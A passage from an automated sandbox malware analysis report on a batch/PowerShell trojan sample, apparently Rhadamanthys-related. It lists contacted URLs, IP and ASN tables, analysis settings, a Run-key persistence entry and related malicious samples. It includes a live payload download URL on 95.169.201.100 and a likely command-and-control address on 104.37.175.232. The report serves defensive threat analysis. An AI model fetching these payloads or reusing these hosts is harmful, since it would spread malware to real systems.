                                                        https://permanently-removed.invalid/embedded/setup/v2/chromeosmsedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://permanently-removed.invalid/v1/eventsmsedge.exe, 0000000B.00000002.1382169258.000062F400258000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://permanently-removed.invalid/o/oauth2/revokemsedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://95.169.201.100:18960powershell.exe, 00000003.00000002.1456571632.000001D9399A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1456571632.000001D939CBF000.00000004.00000800.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://go.microspowershell.exe, 00000003.00000002.1456571632.000001D93A14D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://permanently-removed.invalid/GetCheckConnectionInfomsedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://msn.com/msedge.exe, 0000000B.00000002.1382407088.000062F4003A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://permanently-removed.invalid/LogoutYxABzenmsedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.microsoft.Tpowershell.exe, 00000003.00000002.1503556073.000001D951AD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.macromedia.comhttps://www.macromedia.com/support/flashplayer/sys/&ampreadme.exe, 00000013.00000002.1650378613.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, readme.exe, 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe, 00000013.00000000.1437712543.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe, 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe.3.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://permanently-removed.invalid/v1/accountcapabilities:batchGetmsedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://contoso.com/powershell.exe, 00000003.00000002.1489711504.000001D9497EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1489711504.000001D9497EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://permanently-removed.invalid/signin/chrome/sync?ssp=1msedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://permanently-removed.invalid/devicemanagement/data/apimsedge.exe, 0000000B.00000002.1382476279.000062F4003E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://95.1powershell.exe, 00000003.00000002.1456571632.000001D93A145000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://permanently-removed.invalid/msedge.exe, 0000000B.00000002.1382105334.000062F4001DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://office.net/msedge.exe, 0000000B.00000002.1382407088.000062F4003A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1456571632.000001D939781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://designerapp-dogfood.azurewebsites.net/msedge.exe, 0000000B.00000002.1382105334.000062F4001DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://permanently-removed.invalid/xmsedge.exe, 0000000B.00000002.1382105334.000062F4001DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://permanently-removed.invalid/encryption/unlock/desktopmsedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1489711504.000001D9497EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1456571632.000001D939B14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://95.169.201.100:18960/uploads/team-1/readme.exepowershell.exe, 00000003.00000002.1455526509.000001D9377E9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1456571632.000001D939CBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1504226670.000001D951B98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1497496875.000001D951802000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1456201169.000001D937B10000.00000004.00000020.00020000.00000000.sdmp, 098aPtSbmd.battrue
                                                                                                • Avira URL Cloud: malware
                                                                                                unknown
                                                                                                https://designerapp.azurewebsites.net/msedge.exe, 0000000B.00000002.1382105334.000062F4001DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1456571632.000001D9399A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1456571632.000001D939B14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1456571632.000001D9399A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://chrome.google.com/webstoremsedge.exe, 0000000B.00000002.1381041216.000062F40001C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://go.micropowershell.exe, 00000003.00000002.1456571632.000001D93AB30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1456571632.000001D93A14D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://permanently-removed.invalid/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxABmsedge.exe, 0000000B.00000002.1381291542.000062F400064000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://permanently-removed.invalid/oauth/multiloginmsedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://contoso.com/Iconpowershell.exe, 00000003.00000002.1489711504.000001D9497EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000003.00000002.1456571632.000001D93AB30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1456571632.000001D93B650000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1456571632.000001D93B676000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://cloudflare-dns.com/dns-queryfontdrvhost.exe, 00000018.00000003.1658637494.0000000005271000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000C.00000003.1356786912.000001F2BA590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://crl.ver)svchost.exe, 0000000C.00000002.2513604972.000001F2BA800000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachifontdrvhost.exe, 00000018.00000003.1658637494.0000000005271000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://permanently-removed.invalid/MergeSessionmsedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://permanently-removed.invalid/oauth2/v1/userinfomsedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://permanently-removed.invalid/OAuthLoginmsedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1456571632.000001D9399A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://google.com/msedge.exe, 0000000B.00000002.1382407088.000062F4003A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://permanently-removed.invalid/AddSessionmsedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://permanently-removed.invalid/embedded/setup/kidsignup/chromeosmsedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://g.live.com/odclientsettings/Prod1C:svchost.exe, 0000000C.00000003.1356786912.000001F2BA5E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://permanently-removed.invalid/embedded/setup/kidsignin/chromeosmsedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihuskernelbasentdllkernel32GetProcessMitigfontdrvhost.exe, 00000018.00000003.1730115092.0000000005274000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000001C.00000002.2033082515.00000205BFC30000.00000040.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://msn.cn/msedge.exe, 0000000B.00000002.1382407088.000062F4003A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://permanently-removed.invalid/ListAccounts?json=standardmsedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://.macromedia.com/support/flashplayer/sys/https://SettingsSubdomainmms.cfgdefaultAuthorLocalSecreadme.exe, 00000013.00000002.1650378613.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, readme.exe, 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe, 00000013.00000000.1437712543.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe, 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe.3.drfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://permanently-removed.invalid/Logoutmsedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://permanently-removed.invalid/embedded/setup/windowsmsedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://permanently-removed.invalid/msedge.exe, 0000000B.00000002.1382105334.000062F4001DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1456571632.000001D939B14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://permanently-removed.invalid/embedded/setup/chrome/usermenumsedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://chromewebstore.google.com/msedge.exe, 0000000B.00000002.1381041216.000062F40001C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihusxfontdrvhost.exe, 00000018.00000002.1730989811.000000000076C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://aka.ms/pscore68powershell.exe, 00000003.00000002.1456571632.000001D939781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://permanently-removed.invalid/embedded/xreauth/chromemsedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.macromedia.com/bin/flashdownload.cgireadme.exe, 00000013.00000002.1650378613.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, readme.exe, 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe, 00000013.00000000.1437712543.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe, 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe.3.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.macromedia.com/support/flashplayer/sys/readme.exe, readme.exe, 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe.3.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                            13.107.246.40
                                                                                                                                                                            unknownUnited States
                                                                                                                                                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                            95.169.201.100
                                                                                                                                                                            unknownBulgaria
                                                                                                                                                                            41017GOBULNETBGtrue
                                                                                                                                                                            94.245.104.56
                                                                                                                                                                            ssl.bingadsedgeextension-prod-europe.azurewebsites.netUnited Kingdom
                                                                                                                                                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                            152.195.19.97
                                                                                                                                                                            unknownUnited States
                                                                                                                                                                            15133EDGECASTUSfalse
                                                                                                                                                                            23.219.82.11
                                                                                                                                                                            unknownUnited States
                                                                                                                                                                            20940AKAMAI-ASN1EUfalse
                                                                                                                                                                            104.37.175.232
                                                                                                                                                                            unknownUnited States
                                                                                                                                                                            396073MAJESTIC-HOSTING-01UStrue
                                                                                                                                                                            162.159.61.3
                                                                                                                                                                            chrome.cloudflare-dns.comUnited States
                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                            239.255.255.250
                                                                                                                                                                            unknownReserved
                                                                                                                                                                            unknownunknownfalse
                                                                                                                                                                            142.250.181.129
                                                                                                                                                                            googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                            172.64.41.3
                                                                                                                                                                            unknownUnited States
                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                            13.107.9.158
                                                                                                                                                                            b-0005.b-dc-msedge.netUnited States
                                                                                                                                                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                            IP
                                                                                                                                                                            192.168.2.7
                                                                                                                                                                            127.0.0.1
                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                            Analysis ID:1568256
                                                                                                                                                                            Start date and time:2024-12-04 13:52:07 +01:00
                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                            Overall analysis duration:0h 9m 58s
                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                            Report type:full
                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                            Number of analysed new started processes analysed:36
                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                            Technologies:
                                                                                                                                                                            • HCA enabled
                                                                                                                                                                            • EGA enabled
                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                            Sample name:098aPtSbmd.bat
                                                                                                                                                                            renamed because original name is a hash value
                                                                                                                                                                            Original Sample Name:a739aa217d572cbcdace798a642d1b2c8bda9639aecd6ce95a8303a3de338dca.ps1.bat
                                                                                                                                                                            Detection:MAL
                                                                                                                                                                            Classification:mal100.troj.evad.winBAT@62/257@10/13
                                                                                                                                                                            EGA Information:
                                                                                                                                                                            • Successful, ratio: 40%
                                                                                                                                                                            HCA Information:Failed
                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                            • Found application associated with file extension: .bat
                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 13.107.42.16, 13.107.22.239, 131.253.33.239, 172.217.17.78, 23.218.208.109, 2.19.198.217, 23.32.238.67, 2.16.158.88, 2.16.158.90, 2.16.158.80, 2.16.158.75, 2.16.158.83, 2.16.158.81, 2.16.158.82, 2.16.158.96, 2.16.158.91, 13.107.21.239, 204.79.197.239, 2.20.68.210, 2.20.68.201, 199.232.210.172, 52.168.117.173, 104.208.16.94, 142.250.64.67, 142.250.72.99, 142.251.32.99
                                                                                                                                                                            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, a416.dscd.akamai.net, time.windows.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, clients2.google.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, msedge.b.tlu.dl.delivery.mp.microsoft.com, www.gstatic.com, l-0007.l-msedge.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com, www.bing.com, cdp-f-tlu-net.trafficmanager.net, edge-microsoft-com.dual-a-0036.a-msedge.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, bzib.nelreports.net.akamaized.net, otelrules.azureedge.net, api.edgeoffer.microsoft.com, ctldl.windowsupdate.com, dual-a-0036.dc-msedge.net, www-www.bing.com.tr
                                                                                                                                                                            • Execution Graph export aborted for target fontdrvhost.exe, PID 9200 because there are no executed function
                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 6360 because it is empty
                                                                                                                                                                            • Execution Graph export aborted for target readme.exe, PID 9148 because there are no executed function
                                                                                                                                                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                            • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                            • VT rate limit hit for: 098aPtSbmd.bat
                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                            07:53:06API Interceptor52x Sleep call for process: powershell.exe modified
                                                                                                                                                                            07:53:13API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                            09:41:10API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                            15:40:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run DiskTuner C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exe
                                                                                                                                                                            15:40:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run DiskTuner C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exe
                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                            13.107.246.40Payment Transfer Receipt.shtmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • www.aib.gov.uk/
                                                                                                                                                                            NEW ORDER.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 2s.gg/3zs
                                                                                                                                                                            PO_OCF 408.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 2s.gg/42Q
                                                                                                                                                                            06836722_218 Aluplast.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 2s.gg/3zk
                                                                                                                                                                            Quotation.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 2s.gg/3zM
                                                                                                                                                                            95.169.201.100Documenti relativi alla violazione dei diritti di propriet#U00e0 intellettuale.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                            • 95.169.201.100:18960/uploads/team-1/readme.exe
                                                                                                                                                                            94.245.104.56ton.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                              mtbkkesfthae.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                pyjnkasedf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                    t1gY0BGmOZ.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                      t1gY0BGmOZ.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                chrome.cloudflare-dns.comDocumenti relativi alla violazione dei diritti di propriet#U00e0 intellettuale.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                https://ammyy.com/en/downloads.htmlGet hashmaliciousFlawedammyyBrowse
                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                Kameta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                Kameta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                ton.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                mtbkkesfthae.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                pyjnkasedf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                kingsmaker_6.ca.ps1Get hashmaliciousDucktailBrowse
                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                Job Description.lnk (2).download.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                ssl.bingadsedgeextension-prod-europe.azurewebsites.netton.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                mtbkkesfthae.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                pyjnkasedf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                t1gY0BGmOZ.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                t1gY0BGmOZ.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                fg.microsoft.map.fastly.netDocumenti relativi alla violazione dei diritti di propriet#U00e0 intellettuale.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                https://ammyy.com/en/downloads.htmlGet hashmaliciousFlawedammyyBrowse
                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                mtbkkesfthae.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                CZxDiTktSY.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                GOBULNETBGDocumenti relativi alla violazione dei diritti di propriet#U00e0 intellettuale.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                • 95.169.201.100
                                                                                                                                                                                                https://uspspostxrz.top/us/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 95.169.196.121
                                                                                                                                                                                                https://uspspostqvj.top/us/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 95.169.196.121
                                                                                                                                                                                                http://ads.livetv799.meGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 95.169.196.51
                                                                                                                                                                                                http://email.mg.lbstudio.sk/c/eJxMyr1u6zAMQOGnkbcrkNT_oOEuBtqhWx-AlMTaSGIHtvP-RYEOHc50vl4FUotpGhVjjoRErkxLLW10cY1FS6aQQVNoCKEpcgyBxrRWAnIQIUOGhM4KphRgUCnisgc0Hh5f9i7n9errbs_bdK_LdT1P4_4bmg3N22i3-7qNazkGd9v2h6EZ_hQLlZ5jUs4eHUYqXtV7TphJcneG5vfPt4_8Dw3NSTCCcOHQJZAf4FovrNpSZ0H6wa9tZduW6ajXsj_4tE9dVbdxGA-_7zsAAP__n0tNbgGet hashmaliciousPhisherBrowse
                                                                                                                                                                                                • 95.169.196.83
                                                                                                                                                                                                MICROSOFT-CORP-MSN-AS-BLOCKUSDocumenti relativi alla violazione dei diritti di propriet#U00e0 intellettuale.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                • 13.107.246.40
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
